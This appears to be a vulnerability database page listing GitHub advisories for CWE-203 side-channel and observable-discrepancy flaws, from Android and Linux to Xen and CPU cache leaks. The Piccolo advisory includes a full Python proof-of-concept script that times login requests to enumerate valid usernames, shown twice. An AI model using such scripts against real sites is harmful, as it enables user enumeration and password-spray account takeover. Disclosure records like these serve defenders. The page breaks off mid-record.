Common Weakness Enumeration

CWE-203

Allowed

Observable Discrepancy

Abstraction: Base · Status: Incomplete

The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor.

835 vulnerabilities reference this CWE, most recent first.

GHSA-H42C-M8VJ-Q7PX

Vulnerability from github – Published: 2021-12-16 00:00 – Updated: 2021-12-21 00:01
VLAI
Details

In getMeidForSlot of PhoneInterfaceManager.java, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-186530496

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-1015"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-15T19:15:00Z",
    "severity": "LOW"
  },
  "details": "In getMeidForSlot of PhoneInterfaceManager.java, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-186530496",
  "id": "GHSA-h42c-m8vj-q7px",
  "modified": "2021-12-21T00:01:13Z",
  "published": "2021-12-16T00:00:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1015"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/pixel/2021-12-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-H4G2-8VRH-W26Q

Vulnerability from github – Published: 2022-06-06 00:00 – Updated: 2022-06-15 00:00
VLAI
Details

The Linux kernel before 5.17.9 allows TCP servers to identify clients by observing what source ports are used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-32296"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-05T22:15:00Z",
    "severity": "LOW"
  },
  "details": "The Linux kernel before 5.17.9 allows TCP servers to identify clients by observing what source ports are used.",
  "id": "GHSA-h4g2-8vrh-w26q",
  "modified": "2022-06-15T00:00:24Z",
  "published": "2022-06-06T00:00:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32296"
    },
    {
      "type": "WEB",
      "url": "https://arxiv.org/abs/2209.12993"
    },
    {
      "type": "WEB",
      "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.9"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4c2c8f03a5ab7cb04ec64724d7d176d00bcc91e5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/0xkol/rfc6056-device-tracker"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5173"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H69C-WC8M-XGV4

Vulnerability from github – Published: 2022-05-24 16:56 – Updated: 2024-04-04 01:57
VLAI
Details

Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 routers have a JUCI ACL misconfiguration that allows the "user" account to extract the 3DES key via JSON commands to ubus. The 3DES key is used to decrypt the provisioning file provided by Adamo Telecom on a public URL via cleartext HTTP.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-13140"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-09-16T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 routers have a JUCI ACL misconfiguration that allows the \"user\" account to extract the 3DES key via JSON commands to ubus. The 3DES key is used to decrypt the provisioning file provided by Adamo Telecom on a public URL via cleartext HTTP.",
  "id": "GHSA-h69c-wc8m-xgv4",
  "modified": "2024-04-04T01:57:28Z",
  "published": "2022-05-24T16:56:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-13140"
    },
    {
      "type": "WEB",
      "url": "https://twitter.com/GerardFuguet/status/1169298861782896642"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/docs/47397"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/47390"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/154494/Inteno-IOPSYS-Gateway-3DES-Key-Extraction-Improper-Access.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H7CM-MRVQ-WCFR

Vulnerability from github – Published: 2023-09-12 13:50 – Updated: 2023-09-20 17:45
VLAI
Summary
Piccolo's current `BaseUser.login` implementation is vulnerable to time based user enumeration
Details

Summary

Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server.

The current implementation of BaseUser.login leaks enough information to a malicious user such that they would be able to successfully generate a list of valid users on the platform. As Piccolo on it's own does not also enforce strong passwords (see here), these lists of valid accounts are likely to be used in a password spray attack with the outcome being attempted takeover of user accounts on the platform.

The impact of this vulnerability is minor as it requires chaining with other attack vectors in order to gain more then simply a list of valid users on the underlying platform. The likelihood of this vulnerability is possible as it requires minimal skills to pull off especially given the underlying login functionality for Piccolo based sites is open source.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

This vulnerability relates to this code. Specifically the fact that responses are not returned in constant time, but rather are based off the internal state.

For example, if a user does not exist then None is returned immediately instead of encountering a time expensive hash comparison (Line 225). This discrepancy allows a malicious user to time requests made in order to generate a list of usernames which are valid on the underlying platform for usage in further attacks.

If your curious for some more information regarding this attack avenue, I wrote a blog post awhile back with a similar chain to this with some other types of analysis. It lives here.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Piccolo Setup

  1. In a fresh environment pip install 'piccolo[all]' and piccolo asgi new
  2. For simplified testing purposes, in piccolo_conf.py modify Piccolo to use SQLite:
from piccolo.engine.sqlite import SQLiteEngine
DB = SQLiteEngine()
  1. In the same file, add the required apps for session authentication. The file should look like the following:
from piccolo.engine.sqlite import SQLiteEngine
from piccolo.conf.apps import AppRegistry


DB = SQLiteEngine()

APP_REGISTRY = AppRegistry(
    apps=[
        "home.piccolo_app",
        "piccolo_admin.piccolo_app",
        "piccolo_api.session_auth.piccolo_app",
        "piccolo.apps.user.piccolo_app",
    ]
)
  1. Run the following migrations:
piccolo migrations forwards user
piccolo migrations forwards session_auth
  1. Within app.py, mount session_login at the /login path as follows:
from piccolo_api.session_auth.endpoints import session_login
app.mount("/login", session_login())
  1. Create a new user using piccolo user create, making a note of the username and password for later steps.

Exploitation

The following Python script can be used to reproduce this issue. It could also be expanded to easily take in user lists to conduct user enumeration at scale, however, that is outside the scope of this report.

import asyncio
import time
from collections import defaultdict

import httpx

number_of_attempts = 50
# Set this to the username from step 6.
valid_username = "skelmis"
invalid_username = "invalid"
data = defaultdict(lambda: [])
# Ensure this points to your current enviroment
local_base_url = "http://127.0.0.1:8000"
# Set this to the password from step 6.
valid_password = "disobey-blunt-kindly-postbox-tarantula"
invalid_password = "cabana-polar-secrecy-neurology-pacific"


async def make_request(username, password, session: httpx.AsyncClient):
    start_time = time.time()
    resp = await session.post(
        f"{local_base_url}/login",
        json={"username": username, "password": password},
        follow_redirects=True,
    )
    end_time = time.time()
    if username == valid_username and password == valid_password:
        # Just sanity check expected passes are passing
        assert resp.status_code == 200

    resultant_time = end_time - start_time
    data[f"{username}|{password}"].append(resultant_time)


async def main():
    async with httpx.AsyncClient() as client:
        # This is the baseline correct request
        for _ in range(number_of_attempts):
            await make_request(valid_username, valid_password, client)
            await asyncio.sleep(0.1)

        # This is for a valid user but invalid password
        for _ in range(number_of_attempts):
            await make_request(valid_username, invalid_password, client)
            await asyncio.sleep(0.1)

        # This is for an invalid user and password
        for _ in range(number_of_attempts):
            await make_request(invalid_username, invalid_password, client)
            await asyncio.sleep(0.1)

        r_1 = data[f"{valid_username}|{valid_password}"]
        r_2 = data[f"{valid_username}|{invalid_password}"]
        r_3 = data[f"{invalid_username}|{invalid_password}"]

        r_1_sum = sum(r_1) / len(r_1)
        r_2_sum = sum(r_2) / len(r_2)
        r_3_sum = sum(r_3) / len(r_3)

        print(
            f"Average time to response as a valid user with a valid password: {r_1_sum}"
        )
        print(
            f"Average time to response as a valid user with an invalid password: {r_2_sum}"
        )
        print(
            f"Average time to response as an invalid user with an invalid password: {r_3_sum}"
        )


if __name__ == "__main__":
    asyncio.run(main())

N.B. This script makes 50 requests per username/password combination in order to be more certain of the time to response for each combination

Analysis

The following is the output from the PoC against pip install piccolo Screenshot from 2023-09-08 18-36-45

The following is the output from the PoC against pip install git+https://github.com/piccolo-orm/piccolo.git. Screenshot from 2023-09-08 17-51-16

I have included the results from both versions to highlight that this issue is not as a result of this pull request but as a result of the underlying logic in usage.

Both of these runs clearly show a noticeable difference in the time to response for valid and invalid users which would allow a malicious user to build up a list of users for usage in further attacks against the website. For example, after building up a user list a malicious user may then conduct a password spray attack using common passwords in order to takeover user accounts on the platform.

Impact

What kind of vulnerability is it? Who is impacted?

This is an information disclosure vulnerability. It would affect any Piccolo site, and all users of said Piccolo site who can login via regular login portals.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.120.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "piccolo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.121.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-41885"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-204"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-09-12T13:50:23Z",
    "nvd_published_at": "2023-09-12T21:15:08Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server._\n\nThe current implementation of `BaseUser.login` leaks enough information to a malicious user such that they would be able to successfully generate a list of valid users on the platform. As Piccolo on it\u0027s own does not also enforce strong passwords (see [here](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#implement-proper-password-strength-controls)), these lists of valid accounts are likely to be used in a password spray attack with the outcome being attempted takeover of user accounts on the platform.\n\nThe impact of this vulnerability is minor as it requires chaining with other attack vectors in order to gain more then simply a list of valid users on the underlying platform.\nThe likelihood of this vulnerability is possible as it requires minimal skills to pull off especially given the underlying login functionality for Piccolo based sites is open source.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nThis vulnerability relates to [this](https://github.com/piccolo-orm/piccolo/blob/master/piccolo/apps/user/tables.py#L191-L237) code. Specifically the fact that responses are not returned in constant time, but rather are based off the internal state.\n\nFor example, if a user does not exist then `None` is returned immediately instead of encountering a time expensive hash comparison (Line 225). This discrepancy allows a malicious user to time requests made in order to generate a list of usernames which are valid on the underlying platform for usage in further attacks.\n\nIf your curious for some more information regarding this attack avenue, I wrote a blog post awhile back with a similar chain to this with some other types of analysis. It lives [here](https://skelmis.co.nz/posts/tbue/). \n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n#### Piccolo Setup\n1. In a fresh environment `pip install \u0027piccolo[all]\u0027` and `piccolo asgi new`\n2. For simplified testing purposes, in `piccolo_conf.py` modify Piccolo to use SQLite:\n```python\nfrom piccolo.engine.sqlite import SQLiteEngine\nDB = SQLiteEngine()\n```\n3. In the same file, add the required apps for session authentication. The file should look like the following:\n```python\nfrom piccolo.engine.sqlite import SQLiteEngine\nfrom piccolo.conf.apps import AppRegistry\n\n\nDB = SQLiteEngine()\n\nAPP_REGISTRY = AppRegistry(\n    apps=[\n        \"home.piccolo_app\",\n        \"piccolo_admin.piccolo_app\",\n        \"piccolo_api.session_auth.piccolo_app\",\n        \"piccolo.apps.user.piccolo_app\",\n    ]\n)\n```\n4. Run the following migrations:\n```text\npiccolo migrations forwards user\npiccolo migrations forwards session_auth\n```\n5. Within `app.py`, mount `session_login` at the `/login` path as follows:\n```python\nfrom piccolo_api.session_auth.endpoints import session_login\napp.mount(\"/login\", session_login())\n```\n6. Create a new user using `piccolo user create`, making a note of the username and password for later steps.\n\n#### Exploitation\nThe following Python script can be used to reproduce this issue. It could also be expanded to easily take in user lists to conduct user enumeration at scale, however, that is outside the scope of this report.\n\n```python\nimport asyncio\nimport time\nfrom collections import defaultdict\n\nimport httpx\n\nnumber_of_attempts = 50\n# Set this to the username from step 6.\nvalid_username = \"skelmis\"\ninvalid_username = \"invalid\"\ndata = defaultdict(lambda: [])\n# Ensure this points to your current enviroment\nlocal_base_url = \"http://127.0.0.1:8000\"\n# Set this to the password from step 6.\nvalid_password = \"disobey-blunt-kindly-postbox-tarantula\"\ninvalid_password = \"cabana-polar-secrecy-neurology-pacific\"\n\n\nasync def make_request(username, password, session: httpx.AsyncClient):\n    start_time = time.time()\n    resp = await session.post(\n        f\"{local_base_url}/login\",\n        json={\"username\": username, \"password\": password},\n        follow_redirects=True,\n    )\n    end_time = time.time()\n    if username == valid_username and password == valid_password:\n        # Just sanity check expected passes are passing\n        assert resp.status_code == 200\n\n    resultant_time = end_time - start_time\n    data[f\"{username}|{password}\"].append(resultant_time)\n\n\nasync def main():\n    async with httpx.AsyncClient() as client:\n        # This is the baseline correct request\n        for _ in range(number_of_attempts):\n            await make_request(valid_username, valid_password, client)\n            await asyncio.sleep(0.1)\n\n        # This is for a valid user but invalid password\n        for _ in range(number_of_attempts):\n            await make_request(valid_username, invalid_password, client)\n            await asyncio.sleep(0.1)\n\n        # This is for an invalid user and password\n        for _ in range(number_of_attempts):\n            await make_request(invalid_username, invalid_password, client)\n            await asyncio.sleep(0.1)\n\n        r_1 = data[f\"{valid_username}|{valid_password}\"]\n        r_2 = data[f\"{valid_username}|{invalid_password}\"]\n        r_3 = data[f\"{invalid_username}|{invalid_password}\"]\n\n        r_1_sum = sum(r_1) / len(r_1)\n        r_2_sum = sum(r_2) / len(r_2)\n        r_3_sum = sum(r_3) / len(r_3)\n\n        print(\n            f\"Average time to response as a valid user with a valid password: {r_1_sum}\"\n        )\n        print(\n            f\"Average time to response as a valid user with an invalid password: {r_2_sum}\"\n        )\n        print(\n            f\"Average time to response as an invalid user with an invalid password: {r_3_sum}\"\n        )\n\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n```\n\nN.B. This script makes 50 requests per username/password combination in order to be more certain of the time to response for each combination\n\n\n#### Analysis\n\nThe following is the output from the PoC against `pip install piccolo`\n![Screenshot from 2023-09-08 18-36-45](https://user-images.githubusercontent.com/47520067/266522913-b8a0f499-e38b-47fd-a97d-292900320a01.png)\n\nThe following is the output from the PoC against `pip install git+https://github.com/piccolo-orm/piccolo.git`.\n![Screenshot from 2023-09-08 17-51-16](https://user-images.githubusercontent.com/47520067/266514350-82384ce6-c24f-4b89-8516-ec08282053e1.png)\n\nI have included the results from both versions to highlight that this issue is not as a result of [this](https://github.com/piccolo-orm/piccolo/pull/881) pull request but as a result of the underlying logic in usage.\n\nBoth of these runs clearly show a noticeable difference in the time to response for valid and invalid users which would allow a malicious user to build up a list of users for usage in further attacks against the website. For example, after building up a user list a malicious user may then conduct a [password spray attack](https://owasp.org/www-community/attacks/Password_Spraying_Attack) using common passwords in order to takeover user accounts on the platform.\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nThis is an information disclosure vulnerability. \nIt would affect any Piccolo site, and all users of said Piccolo site who can login via regular login portals.",
  "id": "GHSA-h7cm-mrvq-wcfr",
  "modified": "2023-09-20T17:45:31Z",
  "published": "2023-09-12T13:50:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/piccolo-orm/piccolo/security/advisories/GHSA-h7cm-mrvq-wcfr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41885"
    },
    {
      "type": "WEB",
      "url": "https://github.com/piccolo-orm/piccolo/commit/edcfe3568382922ba3e3b65896e6e7272f972261"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/piccolo-orm/piccolo"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/piccolo/PYSEC-2023-173.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Piccolo\u0027s current `BaseUser.login` implementation is vulnerable to time based user enumeration"
}

GHSA-H88C-J84G-842H

Vulnerability from github – Published: 2022-05-24 17:36 – Updated: 2022-05-24 17:36
VLAI
Details

An issue was discovered in Xen through 4.14.x. Neither xenstore implementation does any permission checks when reporting a xenstore watch event. A guest administrator can watch the root xenstored node, which will cause notifications for every created, modified, and deleted key. A guest administrator can also use the special watches, which will cause a notification every time a domain is created and destroyed. Data may include: number, type, and domids of other VMs; existence and domids of driver domains; numbers of virtual interfaces, block devices, vcpus; existence of virtual framebuffers and their backend style (e.g., existence of VNC service); Xen VM UUIDs for other domains; timing information about domain creation and device setup; and some hints at the backend provisioning of VMs and their devices. The watch events do not contain values stored in xenstore, only key names. A guest administrator can observe non-sensitive domain and device lifecycle events relating to other guests. This information allows some insight into overall system configuration (including the number and general nature of other guests), and configuration of other guests (including the number and general nature of other guests' devices). This information might be commercially interesting or might make other attacks easier. There is not believed to be exposure of sensitive data. Specifically, there is no exposure of VNC passwords, port numbers, pathnames in host and guest filesystems, cryptographic keys, or within-guest data.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-29480"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-12-15T18:15:00Z",
    "severity": "LOW"
  },
  "details": "An issue was discovered in Xen through 4.14.x. Neither xenstore implementation does any permission checks when reporting a xenstore watch event. A guest administrator can watch the root xenstored node, which will cause notifications for every created, modified, and deleted key. A guest administrator can also use the special watches, which will cause a notification every time a domain is created and destroyed. Data may include: number, type, and domids of other VMs; existence and domids of driver domains; numbers of virtual interfaces, block devices, vcpus; existence of virtual framebuffers and their backend style (e.g., existence of VNC service); Xen VM UUIDs for other domains; timing information about domain creation and device setup; and some hints at the backend provisioning of VMs and their devices. The watch events do not contain values stored in xenstore, only key names. A guest administrator can observe non-sensitive domain and device lifecycle events relating to other guests. This information allows some insight into overall system configuration (including the number and general nature of other guests), and configuration of other guests (including the number and general nature of other guests\u0027 devices). This information might be commercially interesting or might make other attacks easier. There is not believed to be exposure of sensitive data. Specifically, there is no exposure of VNC passwords, port numbers, pathnames in host and guest filesystems, cryptographic keys, or within-guest data.",
  "id": "GHSA-h88c-j84g-842h",
  "modified": "2022-05-24T17:36:33Z",
  "published": "2022-05-24T17:36:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-29480"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2C6M6S3CIMEBACH6O7V4H2VDANMO6TVA"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBLV6L6Q24PPQ2CRFXDX4Q76KU776GKI"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2020/dsa-4812"
    },
    {
      "type": "WEB",
      "url": "https://xenbits.xenproject.org/xsa/advisory-115.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-H88X-R4GR-7P66

Vulnerability from github – Published: 2022-09-30 00:00 – Updated: 2022-10-04 00:00
VLAI
Details

Ampere Altra and Ampere Altra Max devices through 2022-07-15 allow attacks via Hertzbleed, which is a power side-channel attack that extracts secret information from the CPU by correlating the power consumption with data being processed on the system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-35888"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-29T01:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Ampere Altra and Ampere Altra Max devices through 2022-07-15 allow attacks via Hertzbleed, which is a power side-channel attack that extracts secret information from the CPU by correlating the power consumption with data being processed on the system.",
  "id": "GHSA-h88x-r4gr-7p66",
  "modified": "2022-10-04T00:00:25Z",
  "published": "2022-09-30T00:00:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35888"
    },
    {
      "type": "WEB",
      "url": "https://amperecomputing.com/products/security-bulletins/hertzbleed.html"
    },
    {
      "type": "WEB",
      "url": "https://developer.arm.com/documentation/ka005111/1-0/?lang=en"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H956-VG6M-C6MM

Vulnerability from github – Published: 2022-02-11 00:00 – Updated: 2022-02-23 00:01
VLAI
Details

The password-reset form in ServiceNow Orlando provides different responses to invalid authentication attempts depending on whether the username exists.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-45901"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-10T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The password-reset form in ServiceNow Orlando provides different responses to invalid authentication attempts depending on whether the username exists.",
  "id": "GHSA-h956-vg6m-c6mm",
  "modified": "2022-02-23T00:01:37Z",
  "published": "2022-02-11T00:00:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45901"
    },
    {
      "type": "WEB",
      "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/servicenow-username-enumeration-vulnerability-cve-2021-45901"
    },
    {
      "type": "WEB",
      "url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/165989/ServiceNow-Orlando-Username-Enumeration.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-H9MF-J5VF-PC99

Vulnerability from github – Published: 2022-05-13 01:20 – Updated: 2026-05-29 21:31
VLAI
Details

Systems with microprocessors utilizing speculative execution and address translations may allow unauthorized disclosure of information residing in the L1 data cache to an attacker with local user access via a terminal page fault and a side-channel analysis.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-3620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-08-14T19:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Systems with microprocessors utilizing speculative execution and address translations may allow unauthorized disclosure of information residing in the L1 data cache to an attacker with local user access via a terminal page fault and a side-channel analysis.",
  "id": "GHSA-h9mf-j5vf-pc99",
  "modified": "2026-05-29T21:31:14Z",
  "published": "2022-05-13T01:20:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3620"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XRFKQWYV2H4BV75CUNGCGE5TNVQCLBGZ"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180018"
    },
    {
      "type": "WEB",
      "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0009"
    },
    {
      "type": "WEB",
      "url": "https://security.FreeBSD.org/advisories/FreeBSD-SA-18:09.l1tf.asc"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201810-06"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20180815-0001"
    },
    {
      "type": "WEB",
      "url": "https://software.intel.com/security-software-guidance/software-guidance/l1-terminal-fault"
    },
    {
      "type": "WEB",
      "url": "https://support.f5.com/csp/article/K95275140"
    },
    {
      "type": "WEB",
      "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03874en_us"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180814-cpusidechannel"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3740-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3740-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3741-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3741-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3742-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3742-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3823-1"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2018/dsa-4274"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2018/dsa-4279"
    },
    {
      "type": "WEB",
      "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00161.html"
    },
    {
      "type": "WEB",
      "url": "https://www.kb.cert.org/vuls/id/982149"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2020.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
    },
    {
      "type": "WEB",
      "url": "https://www.synology.com/support/security/Synology_SA_18_45"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2384"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2387"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2388"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2389"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2390"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2391"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2392"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2393"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2394"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2395"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2396"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2402"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2403"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2404"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2602"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2603"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-254686.pdf"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-608355.pdf"
    },
    {
      "type": "WEB",
      "url": "https://foreshadowattack.eu"
    },
    {
      "type": "WEB",
      "url": "https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00029.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00017.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V4UWGORQWCENCIF2BHWUEF2ODBV75QS2"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XRFKQWYV2H4BV75CUNGCGE5TNVQCLBGZ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V4UWGORQWCENCIF2BHWUEF2ODBV75QS2"
    },
    {
      "type": "WEB",
      "url": "http://support.lenovo.com/us/en/solutions/LEN-24163"
    },
    {
      "type": "WEB",
      "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20180815-01-cpu-en"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105080"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1041451"
    },
    {
      "type": "WEB",
      "url": "http://www.vmware.com/security/advisories/VMSA-2018-0021.html"
    },
    {
      "type": "WEB",
      "url": "http://xenbits.xen.org/xsa/advisory-273.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
